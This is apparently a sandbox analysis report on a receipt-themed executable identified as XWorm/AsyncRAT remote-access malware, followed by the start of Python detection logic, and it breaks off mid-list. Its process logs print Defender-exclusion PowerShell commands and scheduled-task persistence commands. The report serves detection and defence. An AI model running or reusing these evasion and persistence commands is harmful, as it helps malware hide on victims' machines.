            Source: Receipt-#202431029B.exe, 00000000.00000002.1681084980.0000000006AD2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            Source: 0.2.Receipt-#202431029B.exe.257fa9c.0.raw.unpack, XLogger.cs | .Net Code: KeyboardLayout
            Source: 9.2.XetHVID.exe.2b8fa44.1.raw.unpack, XLogger.cs | .Net Code: KeyboardLayout
            Source: 9.2.XetHVID.exe.2b7c8f4.0.raw.unpack, XLogger.cs | .Net Code: KeyboardLayout
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Window created: window name: CLIPBRDWNDCLASS

            System Summary

            Source: 9.2.XetHVID.exe.2b7c8f4.0.unpack, type: UNPACKEDPE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 9.2.XetHVID.exe.2b7c8f4.0.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
            Source: 9.2.XetHVID.exe.2b7c8f4.0.raw.unpack, type: UNPACKEDPE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 9.2.XetHVID.exe.2b7c8f4.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
            Source: 0.2.Receipt-#202431029B.exe.256e6f0.1.unpack, type: UNPACKEDPE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 0.2.Receipt-#202431029B.exe.256e6f0.1.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
            Source: 0.2.Receipt-#202431029B.exe.257fa9c.0.unpack, type: UNPACKEDPE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 0.2.Receipt-#202431029B.exe.257fa9c.0.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
            Source: 9.2.XetHVID.exe.2b8fa44.1.unpack, type: UNPACKEDPE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 9.2.XetHVID.exe.2b8fa44.1.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
            Source: 13.2.XetHVID.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 13.2.XetHVID.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
            Source: 0.2.Receipt-#202431029B.exe.257fa9c.0.raw.unpack, type: UNPACKEDPE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 0.2.Receipt-#202431029B.exe.257fa9c.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
            Source: 9.2.XetHVID.exe.2b8fa44.1.raw.unpack, type: UNPACKEDPE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 9.2.XetHVID.exe.2b8fa44.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
            Source: 0.2.Receipt-#202431029B.exe.256e6f0.1.raw.unpack, type: UNPACKEDPE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 0.2.Receipt-#202431029B.exe.256e6f0.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
            Source: 0000000D.00000002.1750667088.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000009.00000002.1724608978.0000000002B31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000009.00000002.1724608978.0000000002B88000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000000.00000002.1669926241.0000000002521000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
            Source: initial sample | Static PE information: Filename: Receipt-#202431029B.exe
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Process Stats: CPU usage > 49%
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Code function: 0_2_00A23E34
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Code function: 0_2_00A2E124
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Code function: 0_2_00A26F90
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Code function: 0_2_05726BB0
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Code function: 0_2_05726BA2
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Code function: 0_2_0757A16F
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Code function: 0_2_07570040
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Code function: 0_2_07572D30
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Code function: 0_2_075755F8
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Code function: 0_2_075735A0
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Code function: 0_2_07574C48
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Code function: 0_2_07574C37
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Code function: 0_2_07573168
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Code function: 0_2_0757001D
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Code function: 0_2_08B34117
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Code function: 0_2_08B31240
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Code function: 0_2_08B33668
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Code function: 0_2_08B36D08
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Code function: 0_2_08B31230
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Code function: 8_2_01394538
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Code function: 8_2_01391360
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Code function: 8_2_01393F40
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Code function: 8_2_01391A0A
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Code function: 8_2_0537E748
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Code function: 8_2_05374664
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Code function: 8_2_0537B6F0
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Code function: 8_2_0537DAB8
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Code function: 8_2_0537A6B0
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Code function: 8_2_05371E7C
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Code function: 8_2_05376B10
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Code function: 8_2_07505F91
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Code function: 8_2_07503E08
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Code function: 8_2_07503538
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Code function: 8_2_075031F0
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Code function: 8_2_0750159C
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Code function: 8_2_07507C80
            Source: C:\Users\user\AppData\Roaming\XetHVID.exe | Code function: 9_2_01353E34
            Source: C:\Users\user\AppData\Roaming\XetHVID.exe | Code function: 9_2_0135E124
            Source: C:\Users\user\AppData\Roaming\XetHVID.exe | Code function: 9_2_01356F90
            Source: C:\Users\user\AppData\Roaming\XetHVID.exe | Code function: 9_2_05630120
            Source: C:\Users\user\AppData\Roaming\XetHVID.exe | Code function: 9_2_05630130
            Source: C:\Users\user\AppData\Roaming\XetHVID.exe | Code function: 9_2_076595E0
            Source: C:\Users\user\AppData\Roaming\XetHVID.exe | Code function: 9_2_07650040
            Source: C:\Users\user\AppData\Roaming\XetHVID.exe | Code function: 9_2_07652211
            Source: C:\Users\user\AppData\Roaming\XetHVID.exe | Code function: 9_2_07653168
            Source: C:\Users\user\AppData\Roaming\XetHVID.exe | Code function: 9_2_07652D30
            Source: C:\Users\user\AppData\Roaming\XetHVID.exe | Code function: 9_2_076555F8
            Source: C:\Users\user\AppData\Roaming\XetHVID.exe | Code function: 9_2_07653592
            Source: C:\Users\user\AppData\Roaming\XetHVID.exe | Code function: 9_2_07654C48
            Source: C:\Users\user\AppData\Roaming\XetHVID.exe | Code function: 9_2_07654C37
            Source: C:\Users\user\AppData\Roaming\XetHVID.exe | Code function: 9_2_07650006
            Source: C:\Users\user\AppData\Roaming\XetHVID.exe | Code function: 9_2_08CF1240
            Source: C:\Users\user\AppData\Roaming\XetHVID.exe | Code function: 9_2_08CF3668
            Source: C:\Users\user\AppData\Roaming\XetHVID.exe | Code function: 9_2_08CF6D08
            Source: C:\Users\user\AppData\Roaming\XetHVID.exe | Code function: 9_2_08CF1230
            Source: C:\Users\user\AppData\Roaming\XetHVID.exe | Code function: 9_2_056376A8
            Source: C:\Users\user\AppData\Roaming\XetHVID.exe | Code function: 9_2_05637699
            Source: C:\Users\user\AppData\Roaming\XetHVID.exe | Code function: 13_2_02A01360
            Source: C:\Users\user\AppData\Roaming\XetHVID.exe | Code function: 13_2_02A01A0A
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8004 -s 2132
            Source: Receipt-#202431029B.exe, 00000000.00000002.1669926241.0000000002521000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamemrchris1.exe4 vs Receipt-#202431029B.exe
            Source: Receipt-#202431029B.exe, 00000000.00000002.1672270857.0000000003521000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameArthur.dll" vs Receipt-#202431029B.exe
            Source: Receipt-#202431029B.exe, 00000000.00000002.1692900042.0000000008A9E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameRVYv.exeJ vs Receipt-#202431029B.exe
            Source: Receipt-#202431029B.exe, 00000000.00000002.1690476682.00000000072B0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameArthur.dll" vs Receipt-#202431029B.exe
            Source: Receipt-#202431029B.exe, 00000000.00000002.1668785321.000000000062E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs Receipt-#202431029B.exe
            Source: Receipt-#202431029B.exe, 00000000.00000002.1691082517.00000000074E0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameMontero.dll8 vs Receipt-#202431029B.exe
            Source: Receipt-#202431029B.exe, 00000000.00000002.1672270857.0000000003569000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameArthur.dll" vs Receipt-#202431029B.exe
            Source: Receipt-#202431029B.exe, 00000000.00000002.1672270857.0000000003569000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMontero.dll8 vs Receipt-#202431029B.exe
            Source: Receipt-#202431029B.exe, 00000008.00000002.4106209382.0000000003EE1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameRVYv.exeJ vs Receipt-#202431029B.exe
            Source: Receipt-#202431029B.exe, 00000008.00000002.4107351015.0000000005CE9000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameUNKNOWN_FILET vs Receipt-#202431029B.exe
            Source: Receipt-#202431029B.exe | Binary or memory string: OriginalFilenameRVYv.exeJ vs Receipt-#202431029B.exe
            Source: Receipt-#202431029B.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 9.2.XetHVID.exe.2b7c8f4.0.unpack, type: UNPACKEDPE | Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 9.2.XetHVID.exe.2b7c8f4.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 9.2.XetHVID.exe.2b7c8f4.0.raw.unpack, type: UNPACKEDPE | Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 9.2.XetHVID.exe.2b7c8f4.0.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 0.2.Receipt-#202431029B.exe.256e6f0.1.unpack, type: UNPACKEDPE | Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 0.2.Receipt-#202431029B.exe.256e6f0.1.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 0.2.Receipt-#202431029B.exe.257fa9c.0.unpack, type: UNPACKEDPE | Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 0.2.Receipt-#202431029B.exe.257fa9c.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 9.2.XetHVID.exe.2b8fa44.1.unpack, type: UNPACKEDPE | Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 9.2.XetHVID.exe.2b8fa44.1.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 13.2.XetHVID.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 13.2.XetHVID.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 0.2.Receipt-#202431029B.exe.257fa9c.0.raw.unpack, type: UNPACKEDPE | Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 0.2.Receipt-#202431029B.exe.257fa9c.0.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 9.2.XetHVID.exe.2b8fa44.1.raw.unpack, type: UNPACKEDPE | Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 9.2.XetHVID.exe.2b8fa44.1.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 0.2.Receipt-#202431029B.exe.256e6f0.1.raw.unpack, type: UNPACKEDPE | Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 0.2.Receipt-#202431029B.exe.256e6f0.1.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 0000000D.00000002.1750667088.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000009.00000002.1724608978.0000000002B31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000009.00000002.1724608978.0000000002B88000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000000.00000002.1669926241.0000000002521000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: Receipt-#202431029B.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: XetHVID.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: Notepab.exe.8.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 0.2.Receipt-#202431029B.exe.257fa9c.0.raw.unpack, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.Receipt-#202431029B.exe.257fa9c.0.raw.unpack, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.Receipt-#202431029B.exe.257fa9c.0.raw.unpack, AlgorithmAES.cs | Cryptographic APIs: 'TransformFinalBlock'
            Source: 9.2.XetHVID.exe.2b8fa44.1.raw.unpack, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
            Source: 9.2.XetHVID.exe.2b8fa44.1.raw.unpack, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
            Source: 9.2.XetHVID.exe.2b8fa44.1.raw.unpack, AlgorithmAES.cs | Cryptographic APIs: 'TransformFinalBlock'
            Source: 9.2.XetHVID.exe.2b7c8f4.0.raw.unpack, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
            Source: 9.2.XetHVID.exe.2b7c8f4.0.raw.unpack, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
            Source: 9.2.XetHVID.exe.2b7c8f4.0.raw.unpack, AlgorithmAES.cs | Cryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.Receipt-#202431029B.exe.257fa9c.0.raw.unpack, Settings.cs | Base64 encoded string: 'I25u4Juh2DKE/jJyAWIea36tg/hnu/Tyj4tt928ScW4CIvErIBiBkgjSKe9V+MTH'
            Source: 9.2.XetHVID.exe.2b8fa44.1.raw.unpack, Settings.cs | Base64 encoded string: 'I25u4Juh2DKE/jJyAWIea36tg/hnu/Tyj4tt928ScW4CIvErIBiBkgjSKe9V+MTH'
            Source: 9.2.XetHVID.exe.2b7c8f4.0.raw.unpack, Settings.cs | Base64 encoded string: 'I25u4Juh2DKE/jJyAWIea36tg/hnu/Tyj4tt928ScW4CIvErIBiBkgjSKe9V+MTH'
            Source: 9.2.XetHVID.exe.2b7c8f4.0.raw.unpack, ClientSocket.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 9.2.XetHVID.exe.2b7c8f4.0.raw.unpack, ClientSocket.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.Receipt-#202431029B.exe.257fa9c.0.raw.unpack, ClientSocket.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 0.2.Receipt-#202431029B.exe.257fa9c.0.raw.unpack, ClientSocket.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.Receipt-#202431029B.exe.3718dd8.4.raw.unpack, MKwas8PYpZOx8H3OeB.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.Receipt-#202431029B.exe.74e0000.6.raw.unpack, MKwas8PYpZOx8H3OeB.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.Receipt-#202431029B.exe.36ca5b8.2.raw.unpack, BEe5fardcVsVhoTVde.cs | Security API names: _0020.SetAccessControl
            Source: 0.2.Receipt-#202431029B.exe.36ca5b8.2.raw.unpack, BEe5fardcVsVhoTVde.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.Receipt-#202431029B.exe.36ca5b8.2.raw.unpack, BEe5fardcVsVhoTVde.cs | Security API names: _0020.AddAccessRule
            Source: 0.2.Receipt-#202431029B.exe.74e0000.6.raw.unpack, BEe5fardcVsVhoTVde.cs | Security API names: _0020.SetAccessControl
            Source: 0.2.Receipt-#202431029B.exe.74e0000.6.raw.unpack, BEe5fardcVsVhoTVde.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.Receipt-#202431029B.exe.74e0000.6.raw.unpack, BEe5fardcVsVhoTVde.cs | Security API names: _0020.AddAccessRule
            Source: 0.2.Receipt-#202431029B.exe.3718dd8.4.raw.unpack, BEe5fardcVsVhoTVde.cs | Security API names: _0020.SetAccessControl
            Source: 0.2.Receipt-#202431029B.exe.3718dd8.4.raw.unpack, BEe5fardcVsVhoTVde.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.Receipt-#202431029B.exe.3718dd8.4.raw.unpack, BEe5fardcVsVhoTVde.cs | Security API names: _0020.AddAccessRule
            Source: 0.2.Receipt-#202431029B.exe.36ca5b8.2.raw.unpack, MKwas8PYpZOx8H3OeB.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 9.2.XetHVID.exe.2b8fa44.1.raw.unpack, ClientSocket.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 9.2.XetHVID.exe.2b8fa44.1.raw.unpack, ClientSocket.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@20/21@0/1
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | File created: C:\Users\user\AppData\Roaming\XetHVID.exe
            Source: C:\Users\user\AppData\Roaming\XetHVID.exe | Mutant created: NULL
            Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess8004
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1744:120:WilError_03
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Mutant created: \Sessions\1\BaseNamedObjects\jIoPoAuksafzWWog
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7804:120:WilError_03
            Source: C:\Users\user\AppData\Roaming\XetHVID.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7748:120:WilError_03
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7892:120:WilError_03
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | File created: C:\Users\user\AppData\Local\Temp\tmp2668.tmp
            Source: Receipt-#202431029B.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: Receipt-#202431029B.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | File read: C:\Users\user\Desktop\desktop.ini
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: Receipt-#202431029B.exe | ReversingLabs: Detection: 73%
            Source: Receipt-#202431029B.exe | Virustotal: Detection: 43%
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | File read: C:\Users\user\Desktop\Receipt-#202431029B.exe
            Source: unknown | Process created: C:\Users\user\Desktop\Receipt-#202431029B.exe "C:\Users\user\Desktop\Receipt-#202431029B.exe"
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Receipt-#202431029B.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XetHVID.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XetHVID" /XML "C:\Users\user\AppData\Local\Temp\tmp2668.tmp"
            Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Process created: C:\Users\user\Desktop\Receipt-#202431029B.exe "C:\Users\user\Desktop\Receipt-#202431029B.exe"
            Source: unknown | Process created: C:\Users\user\AppData\Roaming\XetHVID.exe C:\Users\user\AppData\Roaming\XetHVID.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
            Source: C:\Users\user\AppData\Roaming\XetHVID.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XetHVID" /XML "C:\Users\user\AppData\Local\Temp\tmp13D7.tmp"
            Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\AppData\Roaming\XetHVID.exe | Process created: C:\Users\user\AppData\Roaming\XetHVID.exe "C:\Users\user\AppData\Roaming\XetHVID.exe"
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8004 -s 2132
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Receipt-#202431029B.exe"
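            The process-creation entries above contain three behaviours that a detection rule should catch independently of this sample's file names: a PowerShell child running Add-MpPreference -ExclusionPath against a path under the user profile, schtasks.exe creating a task from an XML file in the user's Temp directory (the Sigma match listed in the summary), and the sample relaunching its own image (the suspended-process and injection pattern). The Python below is an added example, not part of the Joe Sandbox report or of XWorm; it runs those three checks over parent/command-line pairs transcribed from the entries above plus one constructed benign schtasks /Query entry as a control, and reports the excluded path, the task XML path and the self-spawned image. The input layout (parent image path, child command line) is an assumption; feed it from Sysmon Event ID 1 or Security 4688 fields in practice.

```python
import re
from dataclasses import dataclass

# Constructed input: (parent image path, child command line) pairs transcribed
# from the process-creation entries in the report above, plus one benign
# schtasks /Query entry added as a control. This is not a real log export.
SAMPLE_EVENTS = [
    (r"C:\Users\user\Desktop\Receipt-#202431029B.exe",
     r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XetHVID.exe"'),
    (r"C:\Users\user\Desktop\Receipt-#202431029B.exe",
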